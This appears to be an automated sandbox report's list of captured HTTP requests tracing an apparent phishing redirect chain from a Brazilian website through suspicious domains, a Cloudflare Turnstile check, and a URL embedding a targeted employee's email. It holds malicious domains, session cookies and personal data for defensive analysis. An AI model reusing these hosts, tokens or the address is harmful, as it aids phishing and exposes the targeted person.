Source: global traffic	HTTP traffic detected: GET /www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT___714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx5cBwi3vtsVl9n3MryfS1EFSuufgtMi3vts7O1AR408519___47741237d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT HTTP/1.1Host: www.itanhangasaude.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /2DUx/ HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://www.itanhangasaude.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/2DUx/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ii9RdnVXMlk4Q0pJOFlzbnA2bDRxWXc9PSIsInZhbHVlIjoia0llVG1KMVREc0xvbDVLeVR1Y2wrYTdaNjFmRlY4d2RBSFRacldCbHg4M0x2RWVaTncyMEtlV1JDYnlxejdjbTZUZzBRMmhTWHRpYzhxQlRkK2JkZzJxS1dLMWFRVUg5TEhPa1RBczRwaC9QbU94UFZCN3huU3ordDN3cHFpdWQiLCJtYWMiOiI3MTEwZTM5YzMwMTJmODU5ZWVlYWE3OTJjYWM2ZDkyODU1ZTEwMmJiNjZiNGQxODE4ZTM0YzE4YzczMWM0OGRiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjZvOEpGSFdCQnIrMzkrenRNc1dQN3c9PSIsInZhbHVlIjoiTkVFZTNSeUR5c0IwaWxVN0FTOGlORGtXUy9nVWR0NGhLRFpRYnFoTUJlSjhmTGdtR0srUnVSTTdKR3l2QjlxY0Q0N3lHMVpaZFQ0d1l6ZFkxK01mN0tJMnE0eVl5V0daekViWUZOWjJmQ0p5YmZGUmwxTXAwWDRtUUZVUnVwWGwiLCJtYWMiOiI4ODFkOTBjYjRmMWIxOTQxMDI0NWJmZmM2MDFhM2FhZGNjNjI4ODc0NWQwZGNiNDY5ZTRhZGUzOWVhZmVhMjk3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /5575968202461485388865565DuGzcrTyOZLFNLDIYSVXZDPOLLDSEDNQMSF HTTP/1.1Host: nzd92.6gniu68.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://vkwek.ckyucle.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /5575968202461485388865565DuGzcrTyOZLFNLDIYSVXZDPOLLDSEDNQMSF HTTP/1.1Host: nzd92.6gniu68.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/g/d2a97f6b6ec9/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normal HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=89d53a759ec80cb4 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1057242924:1719990587:tl4agvakrAKEFCaNpdhyIRJf0e6GO8XVdySEz6sZojU/89d53a759ec80cb4/e7db8d6cd2b6574 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/89d53a759ec80cb4/1719992438382/SmI1HZgyGcJMdmX HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/89d53a759ec80cb4/1719992438383/c2633130b86ac0ee267e83463b04f0536de9a1df4bb8645bb21edcc61940ee47/nDxduyEORWLmL4W HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/89d53a759ec80cb4/1719992438382/SmI1HZgyGcJMdmX HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1057242924:1719990587:tl4agvakrAKEFCaNpdhyIRJf0e6GO8XVdySEz6sZojU/89d53a759ec80cb4/e7db8d6cd2b6574 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1057242924:1719990587:tl4agvakrAKEFCaNpdhyIRJf0e6GO8XVdySEz6sZojU/89d53a759ec80cb4/e7db8d6cd2b6574 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /2DUx/ HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://vkwek.ckyucle.com/2DUx/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImdBU0dxSWJsZjlwMDU3aEx6ZEd1VUE9PSIsInZhbHVlIjoib2tVdVZNZU1saFAwM1dSRDRVajVVTEVGOFVJUGZ3bG5MOEhhRGRXK0E1ckwwTXdqOU9pVW91Tk1JVTI4Szk0WE00Q1hDdmtkWFdmNFR6UU9nVXBrUjhUdFFjUG92amFzc0l5Z0t3ZlhQQm0vS1p4UCtqN1BBQXQzTEZBNWdpcWwiLCJtYWMiOiI3Nzg0Zjg1NmMyOTlkNGY4NzcxMjE5MTYxN2RhMzQ2YTRhMDNjOWU0OGI5ZmFhNDUzZGE0ZTE1MTkzNDY5YzA5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InQwZGo2bU9yem9wRmhWSHFkUFFDS0E9PSIsInZhbHVlIjoiaXF6UGdXL202ckJzZGorNVZrL0dpbThzaXEzN1BTUGpyMGhjamVxM3Izelg3TDRvQWw1MnhXYVIzV1J5U1BxL2hmV3REY2xZUG9iRnJza3U5dnZJZ0FORWQ0cTVsNmJaUlNKS2V1YlNxZFlWYnYycVlkSklqQmFCTEl5NDB1TVYiLCJtYWMiOiJjMjc3MjYyMWI0NjU2MzIxY2M2NjRmMzU1NWJlMWY3MjhiZWJkOGQzMWIyMjMwYzdjNjZkNzY2MmVkM2VmZGM1IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /wpn0pH3CIM5nU02jRmQ0L1Y1phPSwbSM0ag HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImdBU0dxSWJsZjlwMDU3aEx6ZEd1VUE9PSIsInZhbHVlIjoib2tVdVZNZU1saFAwM1dSRDRVajVVTEVGOFVJUGZ3bG5MOEhhRGRXK0E1ckwwTXdqOU9pVW91Tk1JVTI4Szk0WE00Q1hDdmtkWFdmNFR6UU9nVXBrUjhUdFFjUG92amFzc0l5Z0t3ZlhQQm0vS1p4UCtqN1BBQXQzTEZBNWdpcWwiLCJtYWMiOiI3Nzg0Zjg1NmMyOTlkNGY4NzcxMjE5MTYxN2RhMzQ2YTRhMDNjOWU0OGI5ZmFhNDUzZGE0ZTE1MTkzNDY5YzA5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InQwZGo2bU9yem9wRmhWSHFkUFFDS0E9PSIsInZhbHVlIjoiaXF6UGdXL202ckJzZGorNVZrL0dpbThzaXEzN1BTUGpyMGhjamVxM3Izelg3TDRvQWw1MnhXYVIzV1J5U1BxL2hmV3REY2xZUG9iRnJza3U5dnZJZ0FORWQ0cTVsNmJaUlNKS2V1YlNxZFlWYnYycVlkSklqQmFCTEl5NDB1TVYiLCJtYWMiOiJjMjc3MjYyMWI0NjU2MzIxY2M2NjRmMzU1NWJlMWY3MjhiZWJkOGQzMWIyMjMwYzdjNjZkNzY2MmVkM2VmZGM1IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /2DUx/?W-crystal.begin@schulergroup.com HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://vkwek.ckyucle.com/2DUx/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjIyaWZWVjlWK2x3OHpRZTExOTYyY0E9PSIsInZhbHVlIjoiWHNialhqU2VsQU5XaEc5Z0tBTC9Xc2FJL1Y5Z2VZbHFWVHgxMWh0cFhXQTVvd3BOd2hDa0p6NzNmcXh1YUlQa3lrL3ZuYURJbUo3cXJLZkZJOWhiblIxcHIzQTFjb3lNMTNWdkVpWmJ4L1FwMmVUYU9JMVk2bGwxczhzWjJBV1ciLCJtYWMiOiJhMWUwOGM3YTg1MDZjYTE2YjM2MmFjOWZlMjZlYWE0NGVhNWZmNDRjOWJiYjIzYTEyMWZjYjA1ZWJiZTljOTdlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InBiU3hwRWZDMmk3a0w5VVdrak1VdGc9PSIsInZhbHVlIjoiN0pGREJJMWE3UkNMVUsrRXMrYjlwSUhQeit1SFBJZlFudllCQTBydUJUNE9pNlhLQ1BVWS9TeWFsMXVjWS9NdlRqYktzbVNWTFREbVY1MDRIT28xWDMvemZmdi95QWUxMnBhMDd6YjNzYytoR2ZIL3oyZjdHSFhkNDhWcWl0MFoiLCJtYWMiOiJhYjVkOGVmOWMzMjc3OWEyOTNkMjQ2YWJjZDIxNzM0N2MzYTBiOWRlYWM2M2MyNmU4MTA5YTJkMGYyYmUyZTQyIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://vkwek.ckyucle.com/2DUx/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ikp6bWxUaVJGcWJad3NFeGtVT1Y2QlE9PSIsInZhbHVlIjoiOTlSQXB3ektMQi9UZjNWdVRycGN0WU9GeHhmU1FpUFhGajZ0cUtwQ1lmVWc4Q2lHZG9rbHZSeEVjTWNrL2JwbEllOE5ZODFGRUY1WDhjc0NUM2NXRmN2akF1MDdiK3RiL0RsSk40NkUzS2FLb1RWc2V4K2M4UE5ubngyRFM5T3oiLCJtYWMiOiJkNjU4ZThiOGIzNWFkYmVhMWM1OTVkZTBiZGEyNzgyMmIzY2IzYWJjOTczYWYxZGI5YTczMzM2MGY4ZTc4OWRmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InYxZ01pTTRXNFRrUlNONit4Zkk3YWc9PSIsInZhbHVlIjoiM0JCNUN6ckFzUGI2akx1T2U1ckJ6UWN1MVBadVo3elJYZytpK1lQV0RFTVVubmVwRHZWYjkwWk1MczBOdm1vUGJIUVRKTmxWdjFCU212dnFDNFFCTzhUT3RBdzROd3kyNkU1RWd3RFZVa0JEMVFmYWhxYVBmUlBKVytFQTlpbmIiLCJtYWMiOiIwMGIyZjU4YWRjZTlkNDA1OWM4YjY5YmVmZTQ3ZDUyZTk5OGFhNDEzNTI5NDFjZDQyODVhMzdjMmEyODViYTRjIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /12TvEGAMcd3aPS6720 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /xy12R7tzrssHzef25 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
